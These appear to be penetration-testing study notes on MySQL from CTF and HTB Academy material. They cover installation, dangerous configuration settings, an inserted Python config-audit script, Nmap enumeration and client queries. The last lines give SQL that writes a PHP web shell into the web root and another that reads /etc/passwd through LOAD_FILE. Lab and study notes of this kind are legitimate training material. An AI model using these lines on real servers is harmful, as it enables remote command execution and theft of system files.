MYSQL

Source: CTF and HTB Academy

  • Usually on port 3306

MySQL is an open-source SQL relational database management system developed and supported by Oracle. A database is simply a structured collection of data organized for easy use and retrieval. The database system can quickly process large amounts of data with high performance.

  • sudo apt install mysql-server -y (install the MySQL server)

  • On Parrot I had to

    • sudo apt install mariadb-client

    • sudo apt install mariadb-server

SQL language

Default Configuration

  • cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'

Dangerous Settings

| Setting | Description |
| --- | --- |
| user | Sets which user the MySQL service will run as. |
| password | Sets the password for the MySQL user. |
| admin_address | The IP address on which to listen for TCP/IP connections on the administrative network interface. |
| debug | This variable indicates the current debugging settings. |
| sql_warnings | This variable controls whether single-row INSERT statements produce an information string if warnings occur. |
| secure_file_priv | This variable is used to limit the effect of data import and export operations. |
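
A defender-side check for the settings listed under Dangerous Settings, as an added example that is not part of the original notes: it parses a MySQL option file and flags risky values. The sample file, the function names and the conditions treated as risky (root service user, non-loopback admin address, empty secure_file_priv) are assumptions chosen for illustration.

```python
import re

# Constructed sample option file (not from the original page).
SAMPLE_CNF = """\
[client]
password = example-password

[mysqld]
user = root
admin_address = 10.0.0.5
secure-file-priv = ""
debug = d:t:o,/tmp/mysqld.trace
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# setting -> (predicate(group, value), finding); thresholds are illustrative assumptions.
CHECKS = {
    "user": (lambda g, v: g == "mysqld" and v == "root", "service runs as root"),
    "password": (lambda g, v: True, "plaintext password stored in the option file"),
    "admin_address": (lambda g, v: v not in LOOPBACK, "admin interface on a non-loopback address"),
    "debug": (lambda g, v: True, "debug tracing is configured"),
    "sql_warnings": (lambda g, v: v.lower() in {"1", "on", "true"}, "INSERT warning strings enabled"),
    "secure_file_priv": (lambda g, v: v == "", "empty: import/export not limited to a directory"),
}

def parse_cnf(text):
    """Yield (group, name, value); '-' and '_' are interchangeable in option names."""
    group = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;!":  # blank, comment, or !include directive
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            group = header.group(1).strip().lower()
            continue
        name, _, value = line.partition("=")
        yield group, name.strip().replace("-", "_").lower(), value.strip().strip("'\"")

def audit(text):
    """Return sorted (group, setting, finding) tuples for risky values."""
    return sorted(
        (g, n, CHECKS[n][1]) for g, n, v in parse_cnf(text)
        if n in CHECKS and CHECKS[n][0](g, v))

if __name__ == "__main__":
    for group, name, message in audit(SAMPLE_CNF):
        print(f"[{group}] {name}: {message}")
```

A setting that is absent from the file is not reported; its effective value can be confirmed on the server with SHOW VARIABLES LIKE 'secure_file_priv';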

Enumeration

Nmap

  • sudo nmap 10.129.14.128 -sV -sC -p3306 --script "mysql*"

Interaction with the server

  • mysql -u root -h 10.129.14.132

  • mysql -u root -pP4SSw0rd -h 10.129.14.128

  • show databases; (list databases)

  • select version(); (show the version)

  • use <database>; (select a database)

  • show tables; (list the tables)

  • show columns from <table>;

  • select * from <table>;

  • select * from <table> where <column> = "<string>"; (example: select host, unique_users from host_summary;)

  • SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; (write local files)

  • select LOAD_FILE("/etc/passwd"); (read local files)
